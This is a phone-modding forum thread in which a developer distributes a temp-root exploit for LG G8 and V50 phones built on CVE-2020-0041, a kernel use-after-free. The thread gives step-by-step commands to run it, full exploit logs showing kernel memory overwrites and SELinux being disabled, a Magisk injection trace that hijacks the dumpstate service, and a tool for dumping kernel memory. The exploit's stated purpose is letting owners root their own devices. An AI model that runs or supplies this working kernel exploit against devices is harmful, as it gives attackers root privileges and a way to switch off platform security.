[+] memstart_addr: 0xffffffd940000000
[+] First level entry: 14d681003 -> next table at ffffffe80d681000
[+] Second level entry: 1094dd003 -> next table at ffffffe7c94dd000
[+] sysctl_table_root = ffffff969925b098
[*] Reallocating content of 'write8_sysctl' with controlled data..[DONE]
[+] Overwriting 0xffffffe8b534b068 with 0xffffffe7d9b4d000...[DONE]
[+] Injected sysctl node!
[*] Reallocating content of 'write8_selinux' with controlled data.[DONE]
[+] Overwriting 0xffffff96999ceffc with 0x0...[DONE]
[*] Node write8_inode, pid 19750, kaddr ffffffe813909480
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_selinux, pid 19833, kaddr ffffffe7f55a9c00
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_sysctl, pid 19783, kaddr ffffffe78bac7c80
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[*] epitem.next = ffffffe78e7f9720
[*] epitem.prev = ffffffe78e7f97d0
[*] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp #


That's what I got on my Sprint G8 February Security patch suing "-t 4". First try.

TEMP ROOOOOT!
 
J

j4nn

Senior Member
Jan 4, 2012
1,227
2,404
@KamioRinn, unfortunately I do not have an easy method to find all the offsets - it involves some reverse engineering work and it needs target kernel image.
Which G8/V50 would you like to get support for?
Just point me to a downloadable kdz and I can try to add support for it.
 
K

KamioRinn

New member
May 17, 2020
2
0
j4nn said:
@KamioRinn, unfortunately I do not have an easy method to find all the offsets - it involves some reverse engineering work and it needs target kernel image.
Which G8/V50 would you like to get support for?
Just point me to a downloadable kdz and I can try to add support for it.
Click to expand...
Click to collapse

Thanks.
The att version can't get ota in our country. They still use um10i version.
But I can't find the kdz of um10i. Maybe same as qm10i(G820QM10i_00_NAO_US_OP_0401)
 
T

tron1

Senior Member
Aug 24, 2005
187
164
Stuttgart
@j4nn
Could you please tell me which kdz is the base for "LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target"

---------- Post added at 14:24 ---------- Previous post was at 14:24 ----------

[/COLOR @j4nn
Could you please tell me which kdz is the base for "LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target"
 
A

antintin

Senior Member
Sep 11, 2019
595
137
LG V40
LG G8
j4nn said:
@KamioRinn, unfortunately I do not have an easy method to find all the offsets - it involves some reverse engineering work and it needs target kernel image.
Which G8/V50 would you like to get support for?
Just point me to a downloadable kdz and I can try to add support for it.
Click to expand...
Click to collapse
Hello, I private messaged you a bit earlier. So I'm on November patch, and that means there is no way for you to make it work then?
 
J

j4nn

Senior Member
Jan 4, 2012
1,227
2,404
@KamioRinn, @motogvasyag, @antintin
guys, please try all available -t num options and see which one of them can get the furthest with the log, then post it here in a text form since beginning, so we can see which factoryversion is on the phone and which one -t worked the best.
I need a kernel binary image that is running on the phone unfortunately.
@tron1, that is from G820UM20b_02_VZW_US_OP_0212.
 
A

antintin

Senior Member
Sep 11, 2019
595
137
LG V40
LG G8
j4nn said:
@KamioRinn, @motogvasyag, @antintin
guys, please try all available -t num options and see which one of them can get the furthest with the log, then post it here in a text form since beginning, so we can see which factoryversion is on the phone and which one -t worked the best.
I need a kernel binary image that is running on the phone unfortunately.

@tron1, that is from G820UM20b_02_VZW_US_OP_0212.
Click to expand...
Click to collapse

Sure, all the g8 forced options give me the exact same results. I'll just include the one from -t 0 in the results I show, but they each restart my phone on the same step. The v50 forced options get stuck a bit earlier.
 

Attachments

  • sprintg8novemberpatchresults.txt
    2.6 KB · Views: 47
You must log in or register to reply here.

Similar threads

M
Downgrading lg g8
Replies
9
Views
4K
B
blaze2051
K
Lg G8 TWRP and backup for sprint
Replies
5
Views
2K
V
vudaik
D
LG G8 G820UM stuck unlocking bootloader plz help?
Replies
12
Views
1K
R
Ratty696
Q
[Kernel][11.15.2020][4.14.205][F2FS] Dragonfly for LG G8 Korean / US
Replies
70
Views
13K
A
armodons
froutanramin
LG G8s 4% Error LGUP
Replies
3
Views
901
St.Noigel
St.Noigel

Top Liked Posts

24 Hours All time
  • There are no posts matching your filters.
  • 15
    J
    j4nn
    temp root exploit for LG G8 ThinQ with android 10 firmware
    including temporal magisk setup from the exploit

    The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
    I have adapted the Pixel 3 specific exploit for kernel 4.14 that is used with LG phones running Android 10 with March security patch level.
    This work has been done upon request of @Inerent who contributed not only with very fine donations, but also did all the testing on his LG phone, as I do not own any LG phone myself.

    As an addon I have implemented setup of magisk v20.4 from temp root exploit included su permission asking notification support, that has been also a hell of work to get working.

    SUPPORTED TARGETS
    You can find currently running fw version with 'getprop ro.vendor.lge.factoryversion' command run in an adb shell.
    • LMG820NAT-00-V20j-LAO-COM-FEB-12-2020+0
    • LMG820NAT-00-V20m-LAO-COM-MAR-18-2020+0
    • LMG820AT-00-V20a-LAO-COM-DEC-23-2019-ARB00+9
    • LMG820AT-00-V20b-LAO-COM-JAN-10-2020-ARB00+0
    • LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2
    • LMG820AT-00-V20c-LAO-COM-MAR-19-2020-ARB00+0
    • LMG820AT-00-V20d-LAO-COM-JAN-28-2020-ARB00+0
    • LMG820AT-00-V20a-LAO-COM-NOV-25-2019-ARB00+0 - Sprint G8 Android 10 beta November 2019 security patch (special treat for @antintin)
    • LMG820AT-00-V20d-LAO-COM-DEC-17-2019-ARB00+1 - Sprint G8 fw 20d
    • LMG820AT-00-V20d-LAO-COM-JAN-29-2020-ARB00+0 - T-Mobile US G8 January 2020 security patch
    • LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0 - Sprint G8 fw 20e February 2020 patch
    • LMG820AT-00-V20a-LAO-COM-JAN-09-2020-ARB00+5 - Verizon G8 fw 20a
    • LMG820AT-00-V20i-LAO-COM-JAN-07-2020-ARB00+0 - AT&T G8 fw 20i
    • LMG820AT-00-V20j-LAO-COM-FEB-04-2020-ARB00+0 - AT&T G8 G820UM fw 20j
    • LMG820AT-00-V21b-LAO-COM-FEB-05-2020-ARB00+1 - Amazon G8 (G820QM821b_01_AMZ_US_OP_0205)
    Please note, it is unlikely that any other fw version than those listed above would work.
    The only (unlikely) case when the exploit could work with different fw version (or different phone model) would be that they would use binary identical kernel image in the firmware.

    USAGE HOWTO
    • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
    • enable developer mode options and in there adb debugging (eventually install adb drivers)
    • download the v50g8-mroot3.zip with the exploit attached in this post and unzip it
    • use 'adb push v50g8-mroot3 /data/local/tmp' and get temp root with following commands in 'adb shell':
      Code: 
      cd /data/local/tmp
chmod 755 ./v50g8-mroot3
./v50g8-mroot3

    If it worked, you should see something like this:
    Code: 
    [+] Mapped 200000
[+] selinux_enforcing before exploit: 1
...
[+] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp # getenforce
Permissive
root_by_cve-2020-0041:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root) context=kernel
root_by_cve-2020-0041:/data/local/tmp #

    In case you get 'target is not supported', you may list supported targets with
    Code: 
    ./v50g8-mroot3 -T
    and try to force one close to yours using '-t num' option.

    Please see the 2nd post for magisk setup from temp root details.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or kernel boot partition, can result with a not anymore booting phone.
    In such case you would need a way to emergency flash stock firmware to recover.
    This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow to make permanent changes in crucial partitions until bootloader unlock is achieved.
    Some partitions might still be possible to modify - for example in case of sony xperia phones it was possible to do permanent debloat via changes in /oem partition and such debloat would survive even factory reset. Similarly some modem configs have been present in /oem allowing to setup IMS for different operators/regions or tune other modem related stuff.

    SOURCES
    Exploit sources for all releases are available at my github here.

    CREDITS
    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

    MEMORY DUMP FOR NEW TARGETS
    Implemented a tool that dumps kernel space memory to a file with the aim to hopefully be able to analyse it for adding new target support in case it does not have a downloadable firmware.
    You can start it similarly as done with v50g8-mroot3, including the '-t num' option.

    Use this tool only in case your phone is not supported but it is exploitable (i.e. v50g8-mroot3 does something reasonable /with any '-t num' option/ including crash/reboot of the phone).
    When v50g8-mroot3 says "target is not supported", use 'v50g8-mroot3 -T' to list supported targets and then 'v50g8-mroot3 -t num' changing num to each one of listed targets, one by one.
    Watch the output log to see which is the most successful (the longest reasonable output if you do not count looping/repeating the same lines).

    With this way found the most close target, remember the '-t num' option and use it with v50g8-dump.
    The tool hopefully creates /data/local/tmp/memdump.bin file and sleep indefinitely then.
    Just open another cmd window and use
    Code: 
    adb pull /data/local/tmp/memdump.bin
    to get the file to your PC, compress it to an archive and post it here - it may eventually help to add support for new target which does not have a downloadable fw, like for example Sprint models.

    DONATIONS
    If you like my work, you can donate using the Donate to Me button with several methods there.

    Already donated:
    Thank you very much to all who donated or are about to donate.

    DOWNLOAD
    View
    6
    J
    j4nn
    MAGISK SETUP FROM TEMP ROOT WITH LOCKED BOOTLOADER
    To enjoy the temporal root with apps asking for root permission, you can now start magisk v20.4 from the root shell provided by the exploit.
    • download the v50g8-mroot3.zip with the exploit attached in the first post
    • download Magisk-v20.4.zip from magisk releases page on github here
    • use 'adb push v50g8-mroot3.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare magisk setup with following commands in 'adb shell'
      Code: 
      cd /data/local/tmp
unzip v50g8-mroot3.zip
chmod 755 v50g8-mroot3 magisk-setup.sh magisk-start.sh
./magisk-setup.sh
    • get temp root and start magisk up with following commands in 'adb shell':
      Code: 
      cd /data/local/tmp
./v50g8-mroot3
./magisk-start.sh -1
./magisk-start.sh -2
./magisk-start.sh -3
      just this point should be done after each reboot to get magisk running again.
      NOTE: please be sure to enter each command separately, line after line - do not paste all in a single block and do not put them in a script.
      There are reasons this is divided in 3 stages. With this approach I got the best stability, while putting ./v50g8-mroot3 together with -1 and/or -2 stuff in a single script run resulted with a reboot most of the time.
      Phases 2 and 3 need to be split for functional reasons to start magisk with working su permission asking notification.

    If it worked, you should see something like this:

    Code: 
    alphalm:/ $ cd /data/local/tmp
alphalm:/data/local/tmp $ ./v50g8-mroot3
[+] factoryversion = LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffd07822fa00
[+] file epitem at ffffffd102da6d00
[+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
[+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff9dee01ebf8
[+] kernel base: ffffff9dece80000
[+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
[+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
[+] init_cred: ffffff9def02fcd0
[+] memstart_addr: 0xfffffff040000000
[+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
[+] Second level entry: ae419003 -> next table at ffffffd06e419000
[+] sysctl_table_root = ffffff9def05c710
[+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
[+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
[+] Injected sysctl node!
[+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[+] epitem.next = ffffffd07822fa20
[+] epitem.prev = ffffffd07822fad8
[+] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1                                                                                                                                                     
+ FRESH=false 
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
Load policy from: /sys/fs/selinux/policy
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2                                                                                                                                                     
+ FRESH=false 
+ '[' -2 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=2 
+ '[' 2 '=' 2 ']'
+ mount -t tmpfs -o 'mode=755' none /sbin
+ chcon u:object_r:rootfs:s0 /sbin
+ chmod 755 /sbin
+ cp -a magisk/boot_patch.sh /sbin
+ cp -a magisk/magiskboot /sbin
+ cp -a magisk/magiskinit64 /sbin
+ cp -a magisk/busybox /sbin
+ cp -a magisk/util_functions.sh /sbin
+ cd /sbin
+ chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
+ mkdir r
+ mount -o bind / r
+ cp -a r/sbin/. /sbin
+ umount r
+ rmdir r
+ mv magiskinit64 magiskinit
+ ./magiskinit -x magisk magisk
+ ln -s /sbin/magiskinit /sbin/magiskpolicy
+ ln -s /sbin/magiskinit /sbin/supolicy
+ false
+ chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
+ rm -f magiskboot util_functions.sh boot_patch.sh
+ ln -s /sbin/magisk /sbin/su
+ ln -s /sbin/magisk /sbin/resetprop
+ ln -s /sbin/magisk /sbin/magiskhide
+ mkdir /sbin/.magisk
+ chmod 755 /sbin/.magisk
+ >/sbin/.magisk/config 
+ echo 'KEEPVERITY=true'
+ >>/sbin/.magisk/config 
+ echo 'KEEPFORCEENCRYPT=true'
+ chmod 000 /sbin/.magisk/config
+ mkdir -p /sbin/.magisk/busybox
+ chmod 755 /sbin/.magisk/busybox
+ mv busybox /sbin/.magisk/busybox
+ mkdir -p /sbin/.magisk/mirror
+ chmod 000 /sbin/.magisk/mirror
+ mkdir -p /sbin/.magisk/block
+ chmod 000 /sbin/.magisk/block
+ mkdir -p /sbin/.magisk/modules
+ chmod 755 /sbin/.magisk/modules
+ mkdir -p /data/adb/modules
+ chmod 755 /data/adb/modules
+ mkdir -p /data/adb/post-fs-data.d
+ chmod 755 /data/adb/post-fs-data.d
+ mkdir -p /data/adb/service.d
+ chmod 755 /data/adb/service.d
+ chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
+ chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
+ /sbin/magisk --daemon
client: launching new main daemon process
+ pidof magiskd
+ MP=14148 
+ '[' -z 14148 ']'
+ >/sbin/.magisk/escalate 
+ echo 14148
+ '[' -e /sbin/.magisk/escalate ']'
+ sleep 1
+ '[' -e /sbin/.magisk/escalate ']'
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3                                                                                                                                                     
+ FRESH=false 
+ '[' -3 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=3 
+ '[' 3 '=' 2 ']'
+ >/sbin/.magisk/magiskd 
+ echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
+ chmod 755 /sbin/.magisk/magiskd
+ chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
+ getprop init.svc.dumpstate
+ SVC='' 
+ timeout=10 
+ '[' 10 -gt 0 ']'
+ stop dumpstate
+ killall -9 magiskd
+ stop dumpstate
+ mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
+ start dumpstate
+ timeout=10 
+ '[' 10 -le 0 ']'
+ pidof magiskd
+ MP=14165 
+ '[' -n 14165 ']'
+ break
+ stop dumpstate
+ sleep 1
+ umount /system/bin/dumpstate
+ rm -f /sbin/.magisk/magiskd
+ '[' '' '=' running ']'
+ rm -f /dev/.magisk_unblock
+ /sbin/magisk --post-fs-data
+ timeout=10 
+ '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
+ sleep 1
+ timeout=9 
+ '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
+ /sbin/magisk --service
+ sleep 1
+ /sbin/magisk --boot-complete
+ chmod 751 /sbin
root_by_cve-2020-0041:/data/local/tmp # id                                                                                                                                                                       
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
root_by_cve-2020-0041:/data/local/tmp # uname -a
Linux localhost 4.14.117-perf #1 SMP PREEMPT Tue Mar 10 18:44:38 KST 2020 aarch64
root_by_cve-2020-0041:/data/local/tmp # getenforce                                                                                                                                                               
Permissive

    Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission now works.
    You can even re-enable selinux like this from 'adb shell':
    Code: 
    su -c 'setenforce 1'
    The magisk setup from exploit including working permission asking has been fully developed by me, it uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as a service.

    TIPS FOR BETTER STABILITY OF THE EXPLOIT
    The exploit works based on use after free, that means it depends on state of memory heap and how it changes during exploit time.
    That means there is some portion of unpredictability and a chance that something else is overwritten than hoped for by shaping the heap.
    So to get best results, one should stop anything that could run in background, like:
    • set airplain mode, turn off wifi and bluetooth so there is no data connection at all
    • set "Stay awake" to ON while charging (i.e. using adb shell) in developer options
    • disable auto updates of system and apps
    • debloat your system so useless apps do not run in background
    • reboot your phone having all the above
    • wait two minutes after boot up with phone unlocked, screen on connected to PC via usb cable having 'adb shell' already active (checking with 'uptime' command)
    • start the exploit
    • after getting root shell and succesfuly starting magisk, do not forget to properly exit the temp root shell by use of 'exit' command two times, so the 'adb shell' with the exploit is ended with the rest of clean up

    CHANGELOG
    • 2020-05-16 : multiple targets supported (v50g8-root)
    • 2020-05-20 : added v50g8-dump tool to dump kernel space memory
    • 2020-05-24 : implemented support for magisk start from the exploit (v50g8-mroot), added support for 4 new G8 targets (3 x Sprint and one T-Mobile US)
    • 2020-06-10 : fixed problem when V50 rebooted/crashed soon after obtaining temp root shell, added support for 3 new G8 targets (Verizon and 2 x AT&T), released as v50g8-mroot2
    • 2020-06-23 : added support for Amazon G8 target and hopefully fixed not getting a root shell problem with mroot2 on G8, released as v50g8-mroot3
    View
    3
    J
    j4nn
    temp root updated for 3 new G8 targets

    Added support for one Verizon G8 and two AT&T G8 targets:
    • LMG820AT-00-V20a-LAO-COM-JAN-09-2020-ARB00+5
    • LMG820AT-00-V20i-LAO-COM-JAN-07-2020-ARB00+0
    • LMG820AT-00-V20j-LAO-COM-FEB-04-2020-ARB00+0
    Also includes changes to make the root shell more stable (should fix issues with V50 but hopefully G8 could benefit too).
    Released as v50g8-mroot2.zip available in the first post.

    @firedroidx, @Shryvone21, @TPMJB
    Please test and confirm if it works here as this build had not been tested.
    View
    2
    A
    antintin
    j4nn said:
    @py0zz1, I wonder why are you working on G8 exploit while it is already available in this thread?
    As stated in OP, I will put it on github later. It is not ready yet, some Sprint V50 users complain about immediate reboot after getting a root shell so it can't be used. It is still work in progress. After it is finished, I will need to clean up the code removing lots of my unneeded debug and test stuff before releasing it.
    Click to expand...
    Click to collapse
    Bootloader unlock and magisk working on Sprint g8!!! Unfortunately after 2 people bricked, but now we know what to do.
    View
    2
    B
    BrandonB1218
    Sent you a donation for your work. Thank you!
    View

New posts